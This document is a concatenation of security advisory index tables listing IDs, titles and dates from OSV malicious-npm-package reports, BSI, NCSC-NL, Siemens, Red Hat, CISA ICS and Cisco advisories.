mal-2024-1293	Malicious code in swift-docc-rendeeeeeer (npm)	2024-04-22T08:02:34Z	2024-04-22T08:02:35Z
mal-2024-1283	Malicious code in cuckoo-3-web-ui-tooling (npm)	2024-04-22T08:02:34Z	2024-04-22T08:02:35Z
mal-2024-1286	Malicious code in djs-status (npm)	2024-04-22T06:18:24Z	2024-04-22T06:18:29Z
mal-2024-1285	Malicious code in djs-embeds-v2 (npm)	2024-04-22T06:18:24Z	2024-04-22T06:18:29Z
mal-2024-1284	Malicious code in discord-caches (npm)	2024-04-22T06:18:24Z	2024-04-22T06:18:29Z
mal-2024-1296	Malicious code in waveapi (npm)	2024-04-22T06:18:23Z	2024-04-22T06:18:24Z
mal-2024-1290	Malicious code in samplenodejsservice (npm)	2024-04-22T06:10:28Z	2024-04-22T06:10:33Z
mal-2024-1281	Malicious code in arkime (npm)	2024-04-22T06:10:28Z	2024-04-22T06:10:33Z
mal-2024-1288	Malicious code in lambda-iss-location (npm)	2024-04-22T06:10:28Z	2024-04-22T06:10:29Z
mal-2024-1282	Malicious code in blockchain-explorer-api (npm)	2024-04-22T06:10:28Z	2024-04-22T06:10:29Z
mal-2024-1294	Malicious code in tari-explorer (npm)	2024-04-22T06:10:28Z	2024-04-22T06:10:28Z
mal-2024-1289	Malicious code in monitoring-coverage (npm)	2024-04-22T06:10:28Z	2024-04-22T06:10:28Z
mal-2024-1292	Malicious code in sid-client-manager (npm)	2024-04-22T06:08:13Z	2024-04-22T06:08:18Z
mal-2024-1279	Malicious code in djs-log (npm)	2024-04-19T06:26:19Z	2024-04-19T06:26:20Z
mal-2024-1278	Malicious code in somepackage-marksl (npm)	2024-04-18T07:28:45Z	2024-04-18T07:28:46Z
mal-2024-1277	Malicious code in malpac (npm)	2024-04-18T07:28:46Z	2024-04-18T07:28:46Z
mal-2024-1272	Malicious code in @portal-packages/core (npm)	2024-04-17T01:45:53Z	2024-04-18T04:33:54Z
mal-2024-1274	Malicious code in ui-common-components-angular (npm)	2024-04-18T01:15:48Z	2024-04-18T01:15:48Z
mal-2024-1273	Malicious code in metrics-balancer (npm)	2024-04-17T19:28:56Z	2024-04-17T19:28:56Z
mal-2024-1275	Malicious code in @portal-packages/utils (npm)	2024-04-17T01:50:45Z	2024-04-17T01:50:45Z
mal-2024-1276	Malicious code in cz-ifood-conventional-changelog (npm)	2024-04-17T00:00:50Z	2024-04-17T00:00:50Z
mal-2024-1267	Malicious code in commitlint-config-ifood (npm)	2024-04-16T21:55:10Z	2024-04-16T21:55:10Z
mal-2024-1271	Malicious code in web-ar-player (npm)	2024-04-16T05:39:28Z	2024-04-16T05:39:29Z
mal-2024-1269	Malicious code in hosted-lenses-ui (npm)	2024-04-16T05:39:28Z	2024-04-16T05:39:29Z
mal-2024-1270	Malicious code in snap-orca (npm)	2024-04-16T05:39:28Z	2024-04-16T05:39:28Z
mal-2024-1268	Malicious code in bluepurellwalker (npm)	2024-04-16T05:39:28Z	2024-04-16T05:39:28Z

Vulnerabilities are sorted by update time (recent to old).
ID	Description	Published	Updated
wid-sec-w-2025-0132	Linux Kernel: Schwachstelle ermöglicht Denial of Service	2025-01-20T23:00:00.000+00:00	2025-01-20T23:00:00.000+00:00
wid-sec-w-2025-0131	OpenSSL: Schwachstelle ermöglicht Offenlegung von Informationen	2025-01-20T23:00:00.000+00:00	2025-01-20T23:00:00.000+00:00
wid-sec-w-2025-0130	vim: Schwachstelle ermöglicht Denial of Service	2025-01-20T23:00:00.000+00:00	2025-01-20T23:00:00.000+00:00
wid-sec-w-2025-0129	7-Zip: Schwachstelle ermöglicht Codeausführung	2025-01-20T23:00:00.000+00:00	2025-01-20T23:00:00.000+00:00
wid-sec-w-2025-0128	Apache CXF: Schwachstelle ermöglicht Denial of Service	2025-01-20T23:00:00.000+00:00	2025-01-20T23:00:00.000+00:00
wid-sec-w-2025-0123	Red Hat Enterprise Linux und and OpenShift (go-git): Mehrere Schwachstellen	2025-01-19T23:00:00.000+00:00	2025-01-20T23:00:00.000+00:00
wid-sec-w-2025-0064	Google Chrome / Microsoft Edge: Mehrere Schwachstellen	2025-01-14T23:00:00.000+00:00	2025-01-20T23:00:00.000+00:00
wid-sec-w-2025-0038	Red Hat Enterprise Linux (iperf): Schwachstelle ermöglicht Denial of Service	2025-01-08T23:00:00.000+00:00	2025-01-20T23:00:00.000+00:00
wid-sec-w-2025-0020	Google Chrome und Microsoft Edge: Schwachstelle ermöglicht Codeausführung	2025-01-07T23:00:00.000+00:00	2025-01-20T23:00:00.000+00:00
wid-sec-w-2025-0017	Redis: Mehrere Schwachstellen	2025-01-06T23:00:00.000+00:00	2025-01-20T23:00:00.000+00:00
wid-sec-w-2024-3630	Python: Schwachstelle ermöglicht Denial of Service	2024-12-08T23:00:00.000+00:00	2025-01-20T23:00:00.000+00:00
wid-sec-w-2024-3497	Linux Kernel: Mehrere Schwachstellen	2024-11-18T23:00:00.000+00:00	2025-01-20T23:00:00.000+00:00
wid-sec-w-2024-3463	Python: Schwachstelle ermöglicht Umgehen von Sicherheitsvorkehrungen	2024-11-13T23:00:00.000+00:00	2025-01-20T23:00:00.000+00:00
wid-sec-w-2024-3251	Linux Kernel: Mehrere Schwachstellen ermöglichen Denial of Service	2024-10-21T22:00:00.000+00:00	2025-01-20T23:00:00.000+00:00
wid-sec-w-2024-1888	Linux Kernel: Mehrere Schwachstellen	2024-08-20T22:00:00.000+00:00	2025-01-20T23:00:00.000+00:00
wid-sec-w-2024-1812	Red Hat Enterprise Linux (389-ds-base ldap server): Schwachstelle ermöglicht Denial of Service	2024-08-11T22:00:00.000+00:00	2025-01-20T23:00:00.000+00:00
wid-sec-w-2024-1761	libTIFF: Schwachstelle ermöglicht Denial of Service	2024-08-05T22:00:00.000+00:00	2025-01-20T23:00:00.000+00:00
wid-sec-w-2024-1722	Linux Kernel: Mehrere Schwachstellen ermöglichen nicht spezifizierten Angriff	2024-07-29T22:00:00.000+00:00	2025-01-20T23:00:00.000+00:00
wid-sec-w-2024-1607	Linux Kernel: Mehrere Schwachstellen	2024-07-14T22:00:00.000+00:00	2025-01-20T23:00:00.000+00:00
wid-sec-w-2024-1259	Linux Kernel: Mehrere Schwachstellen ermöglichen Denial of Service und unspezifischen Angriff	2024-05-30T22:00:00.000+00:00	2025-01-20T23:00:00.000+00:00
wid-sec-w-2024-1235	Linux Kernel: Mehrere Schwachstellen ermöglichen Denial of Service und unspezifische Angriffe	2024-05-26T22:00:00.000+00:00	2025-01-20T23:00:00.000+00:00
wid-sec-w-2024-1197	Linux Kernel: Mehrere Schwachstellen ermöglichen Denial of Service und unspezifische Angriffe	2024-05-21T22:00:00.000+00:00	2025-01-20T23:00:00.000+00:00
wid-sec-w-2024-1188	Linux Kernel: Mehrere Schwachstellen ermöglichen Denial of Service	2024-05-20T22:00:00.000+00:00	2025-01-20T23:00:00.000+00:00
wid-sec-w-2024-0219	libTIFF: Mehrere Schwachstellen ermöglichen Denial of Service	2024-01-25T23:00:00.000+00:00	2025-01-20T23:00:00.000+00:00
wid-sec-w-2023-1613	libTIFF: Mehrere Schwachstellen	2023-06-29T22:00:00.000+00:00	2025-01-20T23:00:00.000+00:00
wid-sec-w-2023-1605	libTIFF: Schwachstelle ermöglicht Denial of Service	2023-06-29T22:00:00.000+00:00	2025-01-20T23:00:00.000+00:00
wid-sec-w-2023-1514	libTIFF: Mehrere Schwachstellen ermöglichen Denial of Service	2023-06-19T22:00:00.000+00:00	2025-01-20T23:00:00.000+00:00
wid-sec-w-2023-1479	libTIFF: Mehrere Schwachstellen ermöglichen nicht spezifizierten Angriff	2023-06-14T22:00:00.000+00:00	2025-01-20T23:00:00.000+00:00
wid-sec-w-2022-1858	Red Hat Enterprise Linux (389-ds-base): Schwachstelle ermöglicht Denial of Service	2022-10-25T22:00:00.000+00:00	2025-01-20T23:00:00.000+00:00
wid-sec-w-2022-0451	Red Hat Enterprise Linux (389-ds-base): Schwachstelle ermöglicht Umgehen von Sicherheitsvorkehrungen	2021-08-10T22:00:00.000+00:00	2025-01-20T23:00:00.000+00:00

Vulnerabilities are sorted by update time (recent to old).
ID	Description	Published	Updated
ncsc-2025-0074	Kwetsbaarheden verholpen in IBM Storage producten	2025-03-04T14:14:48.398751Z	2025-03-04T14:14:48.398751Z
ncsc-2025-0073	Kwetsbaarheden verholpen in VMware producten	2025-03-04T14:11:56.959153Z	2025-03-04T14:11:56.959153Z
ncsc-2025-0072	Kwetsbaarheden verholpen in Google Android en Samsung Mobile	2025-03-04T10:15:32.203439Z	2025-03-04T10:15:32.203439Z
ncsc-2025-0071	Kwetsbaarheid verholpen in Zohocorp ManageEngine ADSelfService Plus	2025-03-03T14:11:46.709999Z	2025-03-03T14:11:46.709999Z
ncsc-2025-0070	Kwetsbaarheden verholpen in GitLab	2025-03-03T14:10:30.120360Z	2025-03-03T14:10:30.120360Z
ncsc-2025-0068	Kwetsbaarheden verholpen in Mattermost	2025-02-24T12:04:19.392654Z	2025-02-24T12:04:19.392654Z
ncsc-2025-0067	Kwetsbaarheid verholpen in Exim	2025-02-21T12:54:32.376733Z	2025-02-21T12:54:32.376733Z
ncsc-2025-0066	Kwetsbaarheid verholpen in XWiki	2025-02-21T12:33:24.503983Z	2025-02-21T12:33:24.503983Z
ncsc-2025-0065	Kwetsbaarheden verholpen in Nagios XI	2025-02-21T12:32:41.120020Z	2025-02-21T12:32:41.120020Z
ncsc-2025-0064	Kwetsbaarheden verholpen in IBM Cognos Controller	2025-02-21T08:40:26.849797Z	2025-02-21T08:40:26.849797Z
ncsc-2025-0058	Kwetsbaarheden verholpen in Palo Alto Networks PAN-OS	2025-02-13T09:28:54.459828Z	2025-02-21T08:08:58.513404Z
ncsc-2025-0063	Kwetsbaarheid verholpen in PostgreSQL	2025-02-19T09:11:55.511966Z	2025-02-19T09:11:55.511966Z
ncsc-2025-0062	Kwetsbaarheid verholpen in Juniper Session Smart Router	2025-02-18T14:25:56.916762Z	2025-02-18T14:25:56.916762Z
ncsc-2025-0053	Kwetsbaarheden verholpen in Fortinet FortiSwitch, FortiManager, FortiAnalyzer, FortiOS en FortiProxy	2025-02-12T12:39:02.366846Z	2025-02-18T08:09:48.619964Z
ncsc-2025-0004	Kwetsbaarheden verholpen in SonicWall SonicOS	2025-01-08T09:57:24.409437Z	2025-02-18T08:09:28.652034Z
ncsc-2025-0061	Kwetsbaarheden verholpen in Siemens producten	2025-02-14T08:46:28.240775Z	2025-02-14T08:46:28.240775Z
ncsc-2025-0060	Kwetsbaarheid verholpen in Veeam	2025-02-13T09:48:03.729080Z	2025-02-13T09:48:03.729080Z
ncsc-2025-0059	Kwetsbaarheid verholpen in Fortinet FortiOS	2025-02-13T09:29:35.625977Z	2025-02-13T09:29:35.625977Z
ncsc-2025-0057	Kwetsbaarheden verholpen in GitLab CE/EE	2025-02-13T09:09:26.087113Z	2025-02-13T09:09:26.087113Z
ncsc-2025-0056	Kwetsbaarheden verholpen in Schneider Electric ASCO	2025-02-13T09:07:55.191514Z	2025-02-13T09:07:55.191514Z
ncsc-2025-0055	Kwetsbaarheid verholpen in CrowdStrike Falcon sensor	2025-02-13T08:22:07.880125Z	2025-02-13T08:22:07.880125Z
ncsc-2025-0054	Kwetsbaarheden verholpen in Adobe Commerce en Magento	2025-02-13T06:46:08.560650Z	2025-02-13T06:46:08.560650Z
ncsc-2025-0052	Kwetsbaarheden verholpen in Ivanti Connect Secure en Ivanti Policy Secure	2025-02-12T09:35:30.260596Z	2025-02-12T09:35:30.260596Z
ncsc-2025-0050	Kwetsbaarheden verholpen in Microsoft Office	2025-02-11T19:19:24.863294Z	2025-02-11T19:19:24.863294Z
ncsc-2025-0049	Kwetsbaarheden verholpen in Microsoft Visual Studio	2025-02-11T19:17:58.768578Z	2025-02-11T19:17:58.768578Z
ncsc-2025-0048	Kwetsbaarheden verholpen in Microsoft Azure	2025-02-11T19:17:03.555400Z	2025-02-11T19:17:03.555400Z
ncsc-2025-0047	Kwetsbaarheden verholpen in Microsoft Windows	2025-02-11T19:16:04.610648Z	2025-02-11T19:16:04.610648Z
ncsc-2025-0046	Kwetsbaarheid verholpen in Apple iOS en iPadOS	2025-02-11T09:54:03.266145Z	2025-02-11T09:54:03.266145Z
ncsc-2025-0045	Kwetsbaarheden verholpen in SAP producten	2025-02-11T09:08:48.427126Z	2025-02-11T09:08:48.427126Z
ncsc-2025-0043	Kwetsbaarheden verholpen in Cisco IOS, IOS XE en IOS XR Software	2025-02-07T07:44:34.306225Z	2025-02-11T06:53:00.177478Z

Vulnerabilities are sorted by update time (recent to old).
ID	Description	Published	Updated
ssa-900277	SSA-900277: MODEL File Parsing Vulnerability in Tecnomatix Plant Simulation before V2302.0012 and V2024.0001	2024-06-11T00:00:00Z	2024-06-11T00:00:00Z
ssa-879734	SSA-879734: Multiple Vulnerabilities in SCALANCE XM-400/XR-500 before V6.6.1	2024-06-11T00:00:00Z	2024-06-11T00:00:00Z
ssa-871704	SSA-871704: Multiple Vulnerabilities in SICAM Products	2024-05-14T00:00:00Z	2024-06-11T00:00:00Z
ssa-832273	SSA-832273: Multiple Vulnerabilities in Fortigate NGFW before V7.4.3 on RUGGEDCOM APE1808 devices	2024-03-12T00:00:00Z	2024-06-11T00:00:00Z
ssa-771940	SSA-771940: X_T File Parsing Vulnerabilities in Teamcenter Visualization and JT2Go	2024-06-11T00:00:00Z	2024-06-11T00:00:00Z
ssa-753746	SSA-753746: Denial of Service Vulnerabilities in SIMATIC WinCC Affecting Other SIMATIC Software Products	2024-02-13T00:00:00Z	2024-06-11T00:00:00Z
ssa-711309	SSA-711309: Denial of Service Vulnerability in the OPC UA Implementations of SIMATIC Products	2023-09-12T00:00:00Z	2024-06-11T00:00:00Z
ssa-690517	SSA-690517: Multiple Vulnerabilities in SCALANCE W700 802.11 AX Family	2024-06-11T00:00:00Z	2024-06-11T00:00:00Z
ssa-625862	SSA-625862: Multiple Vulnerabilities in Third-Party Components in SIMATIC CP 1542SP-1 and CP 1543SP-1 before V2.3	2024-06-11T00:00:00Z	2024-06-11T00:00:00Z
ssa-620338	SSA-620338: Buffer Overflow Vulnerability in SICAM AK3 / BC / TM	2024-06-11T00:00:00Z	2024-06-11T00:00:00Z
ssa-599968	SSA-599968: Denial-of-Service Vulnerability in Profinet Devices	2021-07-13T00:00:00Z	2024-06-11T00:00:00Z
ssa-566905	SSA-566905: Multiple Denial of Service Vulnerabilities in the Webserver of Industrial Products	2023-04-11T00:00:00Z	2024-06-11T00:00:00Z
ssa-540640	SSA-540640: Improper Privilege Management Vulnerability in Mendix Runtime	2024-06-11T00:00:00Z	2024-06-11T00:00:00Z
ssa-482757	SSA-482757: Missing Immutable Root of Trust in S7-1500 CPU devices	2023-01-10T00:00:00Z	2024-06-11T00:00:00Z
ssa-481506	SSA-481506: Information Disclosure Vulnerability in SIMATIC S7-200 SMART Devices	2024-06-11T00:00:00Z	2024-06-11T00:00:00Z
ssa-446448	SSA-446448: Denial of Service Vulnerability in PROFINET Stack Integrated on Interniche Stack	2022-04-12T00:00:00Z	2024-06-11T00:00:00Z
ssa-407785	SSA-407785: Multiple X_T File Parsing Vulnerabilities in Parasolid and Teamcenter Visualization	2023-08-08T00:00:00Z	2024-06-11T00:00:00Z
ssa-398330	SSA-398330: Vulnerabilities in the additional GNU/Linux subsystem of the SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP V3.1	2023-12-12T00:00:00Z	2024-06-11T00:00:00Z
ssa-353002	SSA-353002: Multiple Vulnerabilities in SCALANCE XB-200 / XC-200 / XP-200 / XF-200BA / XR-300WG Family	2024-03-12T00:00:00Z	2024-06-11T00:00:00Z
ssa-341067	SSA-341067: Multiple vulnerabilities in third-party components in ST7 ScadaConnect before V1.1	2024-06-11T00:00:00Z	2024-06-11T00:00:00Z
ssa-337522	SSA-337522: Multiple Vulnerabilities in TIM 1531 IRC before V2.4.8	2024-06-11T00:00:00Z	2024-06-11T00:00:00Z
ssa-319319	SSA-319319: Denial of Service Vulnerability in TIA Administrator	2024-06-11T00:00:00Z	2024-06-11T00:00:00Z
ssa-238730	SSA-238730: Out-of-Bounds Write Vulnerabilities in SITOP UPS1600 before V2.5.4	2024-06-11T00:00:00Z	2024-06-11T00:00:00Z
ssa-196737	SSA-196737: Multiple Vulnerabilities in SINEC Traffic Analyzer before V1.2	2024-06-11T00:00:00Z	2024-06-11T00:00:00Z
ssa-093430	SSA-093430: Multiple Vulnerabilities in SIMATIC RTLS Locating Manager before V3.0	2024-05-14T00:00:00Z	2024-06-11T00:00:00Z
ssa-035466	SSA-035466: Incorrect Permission Assignment in SICAM PAS/PQS	2023-10-10T00:00:00Z	2024-06-11T00:00:00Z
ssa-024584	SSA-024584: Authentication Bypass Vulnerability in PowerSys before V3.11	2024-06-11T00:00:00Z	2024-06-11T00:00:00Z
SSA-900277	SSA-900277: MODEL File Parsing Vulnerability in Tecnomatix Plant Simulation before V2302.0012 and V2024.0001	2024-06-11T00:00:00Z	2024-06-11T00:00:00Z
SSA-879734	SSA-879734: Multiple Vulnerabilities in SCALANCE XM-400/XR-500 before V6.6.1	2024-06-11T00:00:00Z	2024-06-11T00:00:00Z
SSA-871704	SSA-871704: Multiple Vulnerabilities in SICAM Products	2024-05-14T00:00:00Z	2024-06-11T00:00:00Z

Vulnerabilities are sorted by update time (recent to old).
ID	Description	Published	Updated
rhsa-2023:3161	Red Hat Security Advisory: Red Hat OpenStack Platform 13.0 security update	2023-05-17T01:57:13+00:00	2025-06-15T00:57:53+00:00
rhsa-2023:3156	Red Hat Security Advisory: Red Hat OpenStack Platform 16.1 security update	2023-05-17T01:02:32+00:00	2025-06-15T00:57:42+00:00
rhsa-2023:3157	Red Hat Security Advisory: Red Hat OpenStack Platform 17.0 security update	2023-05-17T01:02:40+00:00	2025-06-15T00:57:32+00:00
rhsa-2023:3158	Red Hat Security Advisory: Red Hat OpenStack Platform 16.2 security update	2023-05-17T01:04:39+00:00	2025-06-15T00:57:21+00:00
rhsa-2025:0014	Red Hat Security Advisory: OpenShift Container Platform 4.12.71 bug fix and security update	2025-01-09T02:15:46+00:00	2025-06-15T00:13:18+00:00
rhsa-2024:6755	Red Hat Security Advisory: Red Hat OpenShift Data Foundation 4.16.2 security and bug fix update	2024-09-18T11:56:25+00:00	2025-06-15T00:13:07+00:00
rhsa-2024:10813	Red Hat Security Advisory: OpenShift Container Platform 4.13.54 bug fix and security update	2024-12-12T02:08:06+00:00	2025-06-15T00:13:05+00:00
rhsa-2024:10523	Red Hat Security Advisory: OpenShift Container Platform 4.14.42 bug fix and security update	2024-12-05T00:33:01+00:00	2025-06-15T00:12:52+00:00
rhsa-2024:4118	Red Hat Security Advisory: Red Hat Ceph Storage 5.3 security, bug fix, and enhancement update	2024-06-26T10:05:24+00:00	2025-06-15T00:12:41+00:00
rhsa-2024:10142	Red Hat Security Advisory: OpenShift Container Platform 4.15.39 bug fix and security update	2024-11-26T11:17:01+00:00	2025-06-15T00:12:38+00:00
rhsa-2024:0766	Red Hat Security Advisory: OpenShift Container Platform 4.15.0 security update	2024-02-28T08:10:56+00:00	2025-06-15T00:12:38+00:00
rhsa-2024:3927	Red Hat Security Advisory: Red Hat Ceph Storage 7.1 container image security, and bug fix update	2024-06-13T14:24:58+00:00	2025-06-15T00:12:31+00:00
rhsa-2024:1449	Red Hat Security Advisory: OpenShift Container Platform 4.15.5 bug fix and security update	2024-03-27T11:18:26+00:00	2025-06-15T00:12:28+00:00
rhsa-2024:0833	Red Hat Security Advisory: OpenShift Container Platform 4.12.50 bug fix and security update	2024-02-21T01:44:15+00:00	2025-06-15T00:12:25+00:00
rhsa-2024:1765	Red Hat Security Advisory: OpenShift Container Platform 4.14.21 bug fix and security update	2024-04-18T11:58:59+00:00	2025-06-15T00:12:20+00:00
rhsa-2024:1454	Red Hat Security Advisory: OpenShift Container Platform 4.13.38 bug fix and security update	2024-03-27T00:32:17+00:00	2025-06-15T00:12:16+00:00
rhsa-2024:0837	Red Hat Security Advisory: OpenShift Container Platform 4.14.13 security update	2024-02-20T15:27:06+00:00	2025-06-15T00:12:12+00:00
rhsa-2024:1770	Red Hat Security Advisory: OpenShift Container Platform 4.15.9 bug fix and security update	2024-04-16T14:52:58+00:00	2025-06-15T00:12:09+00:00
rhsa-2024:1037	Red Hat Security Advisory: OpenShift Container Platform 4.13.36 bug fix and security update	2024-03-06T14:46:43+00:00	2025-06-15T00:12:05+00:00
rhsa-2024:0302	Red Hat Security Advisory: Kube Descheduler Operator for Red Hat OpenShift 5.0.0 for RHEL 9:security update	2024-03-06T13:33:21+00:00	2025-06-15T00:12:02+00:00
rhsa-2025:4240	Red Hat Security Advisory: Updated 6.1 container image is now available in the Red Hat Ecosystem Catalog.	2025-04-28T05:29:21+00:00	2025-06-15T00:12:00+00:00
rhsa-2024:0741	Red Hat Security Advisory: OpenShift Container Platform 4.13.33 bug fix and security update	2024-02-14T06:34:01+00:00	2025-06-15T00:11:59+00:00
rhsa-2024:1572	Red Hat Security Advisory: OpenShift Container Platform 4.12.54 bug fix and security update	2024-04-03T06:57:46+00:00	2025-06-15T00:11:57+00:00
rhsa-2024:1052	Red Hat Security Advisory: OpenShift Container Platform 4.12.51 bug fix and security update	2024-03-06T00:38:22+00:00	2025-06-15T00:11:55+00:00
rhsa-2025:1746	Red Hat Security Advisory: Red Hat JBoss Enterprise Application Platform 7.1.9 on RHEL 7 security update	2025-02-24T00:08:27+00:00	2025-06-15T00:11:52+00:00
rhsa-2024:0269	Red Hat Security Advisory: Run Once Duration Override Operator for Red Hat OpenShift 1.1.0 for RHEL 9	2024-02-28T00:20:04+00:00	2025-06-15T00:11:51+00:00
rhsa-2024:0777	Red Hat Security Advisory: jenkins and jenkins-2-plugins security update	2024-02-12T10:27:23+00:00	2025-06-15T00:11:48+00:00
rhsa-2025:1747	Red Hat Security Advisory: Red Hat JBoss Enterprise Application Platform 7.3.12 security update	2025-02-24T00:08:38+00:00	2025-06-15T00:11:45+00:00
rhsa-2024:1464	Red Hat Security Advisory: OpenShift Container Platform 4.11.59 bug fix and security update	2024-03-27T19:51:20+00:00	2025-06-15T00:11:45+00:00
rhsa-2024:0946	Red Hat Security Advisory: OpenShift Container Platform 4.13.35 security update	2024-02-28T14:03:56+00:00	2025-06-15T00:11:45+00:00

Vulnerabilities are sorted by update time (recent to old).
ID	Description	Published	Updated
icsa-25-126-02	Milesight UG65-868M-EA	2025-05-06T06:00:00.000000Z	2025-05-06T06:00:00.000000Z
icsa-25-126-01	Optigo Networks ONS NC600	2025-05-06T06:00:00.000000Z	2025-05-06T06:00:00.000000Z
va-25-079-01	CentralSquare eTRAKiT.Net SQL injection vulnerability	2025-03-20T00:00:00Z	2025-05-02T01:11:43Z
icsma-25-121-01	MicroDicom DICOM Viewer	2025-05-01T06:00:00.000000Z	2025-05-01T06:00:00.000000Z
icsa-25-121-01	KUNBUS GmbH Revolution Pi	2025-05-01T06:00:00.000000Z	2025-05-01T06:00:00.000000Z
va-25-120-01	Commvault Web Server unspecified vulnerability	2025-04-30T00:00:00Z	2025-04-30T00:00:00Z
va-25-119-01	MSP360 Backup insecure filesystem permissions	2025-04-29T15:59:52Z	2025-04-29T15:59:52Z
icsa-25-119-02	Delta Electronics ISPSoft	2025-04-29T06:00:00.000000Z	2025-04-29T06:00:00.000000Z
icsa-25-119-01	Rockwell Automation ThinManager	2025-04-29T06:00:00.000000Z	2025-04-29T06:00:00.000000Z
icsa-25-105-05	Lantronix XPort (Update A)	2025-04-15T06:00:00.000000Z	2025-04-29T06:00:00.000000Z
icsa-25-114-06	Planet Technology Network Products	2025-04-24T06:00:00.000000Z	2025-04-24T06:00:00.000000Z
icsa-25-114-05	Johnson Controls Software House iSTAR Configuration Utility (ICU) Tool	2025-04-24T06:00:00.000000Z	2025-04-24T06:00:00.000000Z
icsa-25-114-04	Nice Linear eMerge E3	2025-04-24T06:00:00.000000Z	2025-04-24T06:00:00.000000Z
icsa-25-114-03	Vestel AC Charger	2025-04-24T06:00:00.000000Z	2025-04-24T06:00:00.000000Z
icsa-25-114-02	ALBEDO Telecom Net.Time - PTP/NTP clock	2025-04-24T06:00:00.000000Z	2025-04-24T06:00:00.000000Z
icsa-24-338-05	Fuji Electric Monitouch V-SFT (Update A)	2024-12-03T07:00:00.000000Z	2025-04-24T06:00:00.000000Z
va-25-104-01	SicommNet multiple vulnerabilities	2025-04-15T13:49:55Z	2025-04-23T00:00:00Z
icsa-25-107-04	Yokogawa Recorder Products	2025-04-17T06:00:00.000000Z	2025-04-17T06:00:00.000000Z
icsa-25-112-02	Siemens TeleControl Server Basic	2025-04-16T00:00:00.000000Z	2025-04-16T00:00:00.000000Z
icsa-25-112-01	Siemens TeleControl Server Basic SQL	2025-04-16T00:00:00.000000Z	2025-04-16T00:00:00.000000Z
icsa-24-074-11	Siemens RUGGEDCOM APE1808 with Fortigate NGFW Devices	2024-03-12T00:00:00.000000Z	2025-04-16T00:00:00.000000Z
icsa-24-074-05	Siemens RUGGEDCOM APE1808	2024-03-12T00:00:00.000000Z	2025-04-16T00:00:00.000000Z
icsa-25-105-09	Mitsubishi Electric Europe B.V. smartRTU	2025-04-15T06:00:00.000000Z	2025-04-15T06:00:00.000000Z
icsa-25-105-07	Delta Electronics COMMGR	2025-04-15T06:00:00.000000Z	2025-04-15T06:00:00.000000Z
icsa-25-105-06	National Instruments LabVIEW	2025-04-15T06:00:00.000000Z	2025-04-15T06:00:00.000000Z
icsa-25-105-04	Growatt Cloud Applications	2025-04-15T06:00:00.000000Z	2025-04-15T06:00:00.000000Z
icsa-25-105-01	Siemens Mendix Runtime	2025-04-08T00:00:00.000000Z	2025-04-14T00:00:00.000000Z
icsa-25-112-04	ABB MV Drives	2025-04-10T08:30:00.000000Z	2025-04-10T08:30:00.000000Z
icsma-25-100-01	INFINITT Healthcare INFINITT PACS	2025-04-10T06:00:00.000000Z	2025-04-10T06:00:00.000000Z
icsa-25-100-08	Subnet Solutions PowerSYSTEM Center	2025-04-10T06:00:00.000000Z	2025-04-10T06:00:00.000000Z

Vulnerabilities are sorted by update time (recent to old).
ID	Description	Published	Updated
cisco-sa-wlc-file-uplpd-rhzg9ufc	Cisco IOS XE Wireless Controller Software Arbitrary File Upload Vulnerability	2025-05-07T16:00:00+00:00	2025-06-06T20:02:48+00:00
cisco-sa-erlang-otp-ssh-xyzzy	Multiple Cisco Products Unauthenticated Remote Code Execution in Erlang/OTP SSH Server: April 2025	2025-04-22T21:45:00+00:00	2025-06-06T18:12:24+00:00
cisco-sa-ise-aws-static-cred-fpmjucm7	Cisco Identity Services Engine on Cloud Platforms Static Credential Vulnerability	2025-06-04T16:00:00+00:00	2025-06-05T12:45:35+00:00
cisco-sa-vos-command-inject-65s2ucyy	Cisco Unified Communications Products Command Injection Vulnerability	2025-06-04T16:00:00+00:00	2025-06-04T16:00:00+00:00
cisco-sa-ucs-ssh-priv-esc-2mzdtdjm	Cisco Integrated Management Controller Privilege Escalation Vulnerability	2025-06-04T16:00:00+00:00	2025-06-04T16:00:00+00:00
cisco-sa-uccx-editor-rce-ezyyzte8	Cisco Unified Contact Center Express Editor Remote Code Execution Vulnerability	2025-06-04T16:00:00+00:00	2025-06-04T16:00:00+00:00
cisco-sa-te-endagent-filewrt-zncdqnrj	Cisco ThousandEyes Endpoint Agent for Windows Arbitrary File Delete Vulnerabilities	2025-06-04T16:00:00+00:00	2025-06-04T16:00:00+00:00
cisco-sa-ndfc-shkv-snqjtjrp	Cisco Nexus Dashboard Fabric Controller SSH Host Key Validation Vulnerability	2025-06-04T16:00:00+00:00	2025-06-04T16:00:00+00:00
cisco-sa-meraki-mx-vpn-dos-qtrhzg2	Cisco Meraki MX and Z Series Teleworker Gateway AnyConnect VPN Denial of Service Vulnerabilities	2024-10-02T16:00:00+00:00	2025-06-02T14:22:28+00:00
cisco-sa-meraki-mx-vpn-dos-by-qwukqv7x	Cisco Meraki MX and Z Series Teleworker Gateway AnyConnect VPN Session Takeover and Denial of Service Vulnerability	2024-10-02T16:00:00+00:00	2025-06-02T14:22:27+00:00
cisco-sa-webex-xss-7teqtfn8	Cisco Webex Services Cross-Site Scripting Vulnerabilities	2025-05-21T16:00:00+00:00	2025-05-21T16:00:00+00:00
cisco-sa-webex-cache-q4xbkqbg	Cisco Webex Meetings Services HTTP Cache Poisoning Vulnerability	2025-05-21T16:00:00+00:00	2025-05-21T16:00:00+00:00
cisco-sa-sna-ssti-dpulqsmz	Cisco Secure Network Analytics Manager Privilege Escalation Vulnerability	2025-05-21T16:00:00+00:00	2025-05-21T16:00:00+00:00
cisco-sa-sna-apiacv-4b6x5ysw	Cisco Secure Network Analytics Manager API Authorization Vulnerability	2025-05-21T16:00:00+00:00	2025-05-21T16:00:00+00:00
cisco-sa-ise-stored-xss-yff54m73	Cisco Identity Services Stored Cross-Site Scripting Vulnerability	2025-05-21T16:00:00+00:00	2025-05-21T16:00:00+00:00
cisco-sa-ise-restart-ss-uf986g2q	Cisco Identity Services Engine RADIUS Denial of Service Vulnerability	2025-05-21T16:00:00+00:00	2025-05-21T16:00:00+00:00
cisco-sa-duo-ssp-cmd-inj-rcmyrna	Cisco Duo Self-Service Portal Command Injection Vulnerability	2025-05-21T16:00:00+00:00	2025-05-21T16:00:00+00:00
cisco-sa-cuis-priv-esc-3pk96su4	Cisco Unified Intelligence Center Privilege Escalation Vulnerabilities	2025-05-21T16:00:00+00:00	2025-05-21T16:00:00+00:00
cisco-sa-cucm-kkhzbhr5	Cisco Unified Communications Products Privilege Escalation Vulnerability	2025-05-21T16:00:00+00:00	2025-05-21T16:00:00+00:00
